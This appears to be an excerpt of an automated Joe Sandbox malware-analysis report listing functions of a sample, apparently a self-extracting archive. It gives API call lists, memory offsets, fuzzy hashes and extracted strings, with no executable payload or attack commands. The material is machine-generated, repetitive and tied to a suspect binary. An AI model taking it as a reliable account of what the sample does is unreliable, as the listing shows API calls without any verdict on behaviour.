                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                    • String ID: p[
                                                                                                                    • API String ID: 776569668-3527190296
                                                                                                                    • Opcode ID: c6d7b6dff746748963f78ea35c61656045cbbbe0d82558f086254d13d98cc9cf
                                                                                                                    • Instruction ID: e8ab1503d8299b413da2a9f20277270b0bad7f0cf17ac6f10f6e495726721cd1
                                                                                                                    • Opcode Fuzzy Hash: c6d7b6dff746748963f78ea35c61656045cbbbe0d82558f086254d13d98cc9cf
                                                                                                                    • Instruction Fuzzy Hash: 81F09AB98001638B8A4E7F24FC824AA3FA8F736710B040646F1454A2B9CF719949BB81
                                                                                                                    Function 0059146A Relevance: 9.1, APIs: 6, Instructions: 98timeCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 005914C2
                                                                                                                      • Part of subcall function 0058B146: GetVersionExW.KERNEL32(?), ref: 0058B16B
                                                                                                                    • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 005914E6
                                                                                                                    • FileTimeToSystemTime.KERNEL32(?,?), ref: 00591500
                                                                                                                    • TzSpecificLocalTimeToSystemTime.KERNEL32(00000000,?,?), ref: 00591513
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00591523
                                                                                                                    • SystemTimeToFileTime.KERNEL32(?,?), ref: 00591533
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$File$System$Local$SpecificVersion
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2092733347-0
                                                                                                                    • Opcode ID: 50c8134969866da871a1d3992c184fbbd0262d80f8b1bd028ebd8765923ab5b2
                                                                                                                    • Instruction ID: bc6fabfc1627738168a285f92e79cdd1a19925366ce866b46d02ef1591c00b88
                                                                                                                    • Opcode Fuzzy Hash: 50c8134969866da871a1d3992c184fbbd0262d80f8b1bd028ebd8765923ab5b2
                                                                                                                    • Instruction Fuzzy Hash: A931D975108356ABC704DFA8C88499BBBECFF98754F044A1EF995D3210E730E549CBA6
                                                                                                                    Function 005A2AFA Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,?,005A2AF1,005A02FC,0059FA34), ref: 005A2B08
                                                                                                                    • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 005A2B16
                                                                                                                    • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 005A2B2F
                                                                                                                    • SetLastError.KERNEL32(00000000,005A2AF1,005A02FC,0059FA34), ref: 005A2B81
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLastValue___vcrt_
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3852720340-0
                                                                                                                    • Opcode ID: 60c91a0826b03e3ed69036dee299620ee6ecc2a6ba3962feff11beed42056793
                                                                                                                    • Instruction ID: 5078857da6602707d0872035cd1944aadc9f73f537954b1abd3fdddac020df93
                                                                                                                    • Opcode Fuzzy Hash: 60c91a0826b03e3ed69036dee299620ee6ecc2a6ba3962feff11beed42056793
                                                                                                                    • Instruction Fuzzy Hash: B001F13210931E6FA7542B786C8B96E2F48FFA37B8B604739F011608E0EE216C04A220
                                                                                                                    Function 005A97E5 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetLastError.KERNEL32(?,005C1030,005A4674,005C1030,?,?,005A3F73,00000050,?,005C1030,00000200), ref: 005A97E9
                                                                                                                    • _free.LIBCMT ref: 005A981C
                                                                                                                    • _free.LIBCMT ref: 005A9844
                                                                                                                    • SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A9851
                                                                                                                    • SetLastError.KERNEL32(00000000,?,005C1030,00000200), ref: 005A985D
                                                                                                                    • _abort.LIBCMT ref: 005A9863
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorLast$_free$_abort
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3160817290-0
                                                                                                                    • Opcode ID: 0216f1d65a4ee1f3e4bf090a8e7c5ca4c060b7a2bb64279defca2b4abcc90948
                                                                                                                    • Instruction ID: b3b1907d8637122417f86a34341fb0d3863f3f339c8c0610985dd600eb5c6f0e
                                                                                                                    • Opcode Fuzzy Hash: 0216f1d65a4ee1f3e4bf090a8e7c5ca4c060b7a2bb64279defca2b4abcc90948
                                                                                                                    • Instruction Fuzzy Hash: B9F0C83514062766C75233347C1EA6F2E69FFE3B71F340224F614A2192FF38880A9565
                                                                                                                    Function 0059DC3B Relevance: 9.0, APIs: 6, Instructions: 42windowsynchronizationCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0059DC47
                                                                                                                    • PeekMessageW.USER32(?,00000000,00000000,00000000,00000000), ref: 0059DC61
                                                                                                                    • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 0059DC72
                                                                                                                    • TranslateMessage.USER32(?), ref: 0059DC7C
                                                                                                                    • DispatchMessageW.USER32(?), ref: 0059DC86
                                                                                                                    • WaitForSingleObject.KERNEL32(?,0000000A), ref: 0059DC91
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Message$ObjectSingleWait$DispatchPeekTranslate
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2148572870-0
                                                                                                                    • Opcode ID: dec22b435975bb0952d2ea19487e003e4436f16ad8935cc85ec53b787b3d957a
                                                                                                                    • Instruction ID: d20d3df6534469a1589cab1ca13ead9f5e85a46e3281a4d77654b3e4ea9c6272
                                                                                                                    • Opcode Fuzzy Hash: dec22b435975bb0952d2ea19487e003e4436f16ad8935cc85ec53b787b3d957a
                                                                                                                    • Instruction Fuzzy Hash: 0CF03C72A01229BBCF20ABA5DC4CDDB7F7DEF51791B004121F50AE6050D674964AD7B0
                                                                                                                    Function 0059A80C Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 237COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 0059A699: GetDC.USER32(00000000), ref: 0059A69D
                                                                                                                      • Part of subcall function 0059A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0059A6A8
                                                                                                                      • Part of subcall function 0059A699: ReleaseDC.USER32(00000000,00000000), ref: 0059A6B3
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0059A83C
                                                                                                                      • Part of subcall function 0059AAC9: GetDC.USER32(00000000), ref: 0059AAD2
                                                                                                                      • Part of subcall function 0059AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0059AB01
                                                                                                                      • Part of subcall function 0059AAC9: ReleaseDC.USER32(00000000,?), ref: 0059AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                    • String ID: "Y$($AY
                                                                                                                    • API String ID: 1061551593-4108297516
                                                                                                                    • Opcode ID: f63a38aa6e9e27049e37affdd0fef8c68b395383e2f274dad66b8bd7c91bf74b
                                                                                                                    • Instruction ID: c0b1a35637d2fed6197d5ca26be9042781a501ebd5d1a761e93cc3e34cbf420d
                                                                                                                    • Opcode Fuzzy Hash: f63a38aa6e9e27049e37affdd0fef8c68b395383e2f274dad66b8bd7c91bf74b
                                                                                                                    • Instruction Fuzzy Hash: B291E375604350AFDB51DF25C848A2BBBE8FFD9700F00491EF59AD7260DB30A905DBA2
                                                                                                                    Function 0058C0C5 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 148COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 005905DA: _wcslen.LIBCMT ref: 005905E0
                                                                                                                      • Part of subcall function 0058B92D: _wcsrchr.LIBVCRUNTIME ref: 0058B944
                                                                                                                    • _wcslen.LIBCMT ref: 0058C197
                                                                                                                    • _wcslen.LIBCMT ref: 0058C1DF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$_wcsrchr
                                                                                                                    • String ID: .exe$.rar$.sfx
                                                                                                                    • API String ID: 3513545583-31770016
                                                                                                                    • Opcode ID: 40df12bb59cdcf3150d26886733df4db84790914e5df59389da6c39e46243d8b
                                                                                                                    • Instruction ID: 409f52b542173a3d789041f7fe6ec1fb4484ed6341fdf8e3d61990f8719705bb
                                                                                                                    • Opcode Fuzzy Hash: 40df12bb59cdcf3150d26886733df4db84790914e5df59389da6c39e46243d8b
                                                                                                                    • Instruction Fuzzy Hash: BD41F22655032699DB31BF24885AA7EBFA8FF81744F14090EFD967B1C1EB705A81C3B1
                                                                                                                    Function 0058BB03 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 127COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcslen.LIBCMT ref: 0058BB27
                                                                                                                    • GetCurrentDirectoryW.KERNEL32(000007FF,?,?,?,?,00000000,?,?,0058A275,?,?,00000800,?,0058A23A,?,0058755C), ref: 0058BBC5
                                                                                                                    • _wcslen.LIBCMT ref: 0058BC3B
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcslen$CurrentDirectory
                                                                                                                    • String ID: UNC$\\?\
                                                                                                                    • API String ID: 3341907918-253988292
                                                                                                                    • Opcode ID: b55a9780b4c67c954bc56051615b8c1b0f8f0233cfd3c4699d754fbda0ab551c
                                                                                                                    • Instruction ID: f14b868fd2ed01cd64f817ec1a6b3971aea09d31b5af791d92e40fe923082504
                                                                                                                    • Opcode Fuzzy Hash: b55a9780b4c67c954bc56051615b8c1b0f8f0233cfd3c4699d754fbda0ab551c
                                                                                                                    • Instruction Fuzzy Hash: E6417F31840217AAEF21BF60CC46EEA7FADBF85390F104465FC54B7151EB70AE908B60
                                                                                                                    Function 0059CD58 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 103COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0059CD84
                                                                                                                      • Part of subcall function 0059AF98: _wcschr.LIBVCRUNTIME ref: 0059B033
                                                                                                                      • Part of subcall function 00591FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0058C116,00000000,.exe,?,?,00000800,?,?,?,00598E3C), ref: 00591FD1
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr$CompareString
                                                                                                                    • String ID: <$HIDE$MAX$MIN
                                                                                                                    • API String ID: 69343711-3358265660
                                                                                                                    • Opcode ID: 92faed0b257b70b070535c0693301ba120a3ee775132cd17aa54da6610277492
                                                                                                                    • Instruction ID: 5dec64be7801cbf7a139aa7fb3cc15cf9c4ad01597b44d3e972b56906622d742
                                                                                                                    • Opcode Fuzzy Hash: 92faed0b257b70b070535c0693301ba120a3ee775132cd17aa54da6610277492
                                                                                                                    • Instruction Fuzzy Hash: F931837290061A9ADF25DB50CC45FEE7FBCFB55350F004566E506E7180EBB09E848FA1
                                                                                                                    Function 0059AAC9 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 77COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetDC.USER32(00000000), ref: 0059AAD2
                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0059AB01
                                                                                                                    • ReleaseDC.USER32(00000000,?), ref: 0059AB99
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ObjectRelease
                                                                                                                    • String ID: -Y$7Y
                                                                                                                    • API String ID: 1429681911-16496590
                                                                                                                    • Opcode ID: a9dc8d3cd14ec4952d3dc85a5deea270bf5fb13c83240174814274643e9c36b1
                                                                                                                    • Instruction ID: 47ccb0b3943fb19f69e1759f79e5382d286450d4a3a0fd7001b69c85fba27155
                                                                                                                    • Opcode Fuzzy Hash: a9dc8d3cd14ec4952d3dc85a5deea270bf5fb13c83240174814274643e9c36b1
                                                                                                                    • Instruction Fuzzy Hash: 95211972108344FFD3059FA5DC8CE6FBFE9FB99351F040829FA8597120D6319A58AB62
                                                                                                                    Function 0058B991 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • _swprintf.LIBCMT ref: 0058B9B8
                                                                                                                      • Part of subcall function 00584092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 005840A5
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0058B9D6
                                                                                                                    • _wcschr.LIBVCRUNTIME ref: 0058B9E6
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _wcschr$__vswprintf_c_l_swprintf
                                                                                                                    • String ID: %c:\
                                                                                                                    • API String ID: 525462905-3142399695
                                                                                                                    • Opcode ID: c0be0fda30bb28caf2dee06c80b432a668f2ab3d6ac585d2d8049e748f440703
                                                                                                                    • Instruction ID: 09760344dbf91b39b6319c421a76721664427bc91e1d74c9dba65e4d9d29cfcd
                                                                                                                    • Opcode Fuzzy Hash: c0be0fda30bb28caf2dee06c80b432a668f2ab3d6ac585d2d8049e748f440703
                                                                                                                    • Instruction Fuzzy Hash: A301F56350031369AA347B398C4AD6FAFACFFD2770B80480AF945F6182EB20D84083B1
                                                                                                                    Function 0059B270 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 62COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00581316: GetDlgItem.USER32(00000000,00003021), ref: 0058135A
                                                                                                                      • Part of subcall function 00581316: SetWindowTextW.USER32(00000000,005B35F4), ref: 00581370
                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0059B2BE
                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0059B2D6
                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0059B304
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                    • String ID: GETPASSWORD1$xz]
                                                                                                                    • API String ID: 445417207-102821554
                                                                                                                    • Opcode ID: 189325200ad798432a80d96a405ea837d761c9b4dda00d7e4789000055432964
                                                                                                                    • Instruction ID: 4f6f2ee18f6f3dfc67f559bf9a84ca6041de28479bce3c68480d8d1f6ad5a28f
                                                                                                                    • Opcode Fuzzy Hash: 189325200ad798432a80d96a405ea837d761c9b4dda00d7e4789000055432964
                                                                                                                    • Instruction Fuzzy Hash: 0711E132900129B6FF22AB64AE4DFFE3F6CFB5A700F000421FA45B7080D7A09A059761
                                                                                                                    Function 0059B6DD Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 58windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadBitmapW.USER32(00000065), ref: 0059B6ED
                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0059B712
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0059B744
                                                                                                                    • DeleteObject.GDI32(00000000), ref: 0059B767
                                                                                                                      • Part of subcall function 0059A6C2: FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0059B73D,00000066), ref: 0059A6D5
                                                                                                                      • Part of subcall function 0059A6C2: SizeofResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A6EC
                                                                                                                      • Part of subcall function 0059A6C2: LoadResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A703
                                                                                                                      • Part of subcall function 0059A6C2: LockResource.KERNEL32(00000000,?,?,?,0059B73D,00000066), ref: 0059A712
                                                                                                                      • Part of subcall function 0059A6C2: GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0059B73D,00000066), ref: 0059A72D
                                                                                                                      • Part of subcall function 0059A6C2: GlobalLock.KERNEL32(00000000), ref: 0059A73E
                                                                                                                      • Part of subcall function 0059A6C2: CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0059A762
                                                                                                                      • Part of subcall function 0059A6C2: GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0059A7A7
                                                                                                                      • Part of subcall function 0059A6C2: GlobalUnlock.KERNEL32(00000000), ref: 0059A7C6
                                                                                                                      • Part of subcall function 0059A6C2: GlobalFree.KERNEL32(00000000), ref: 0059A7CD
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.1674724548.0000000000581000.00000020.00000001.01000000.00000003.sdmp, Offset: 00580000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.1674706736.0000000000580000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674757789.00000000005B3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005C5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674780574.00000000005E2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.1674834313.00000000005E3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_580000_1znAXdPcM5.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Global$Resource$Object$BitmapCreateDeleteLoadLock$AllocFindFreeFromGdipSizeofStreamUnlock
                                                                                                                    • String ID: ]
                                                                                                                    • API String ID: 1797374341-3352871620
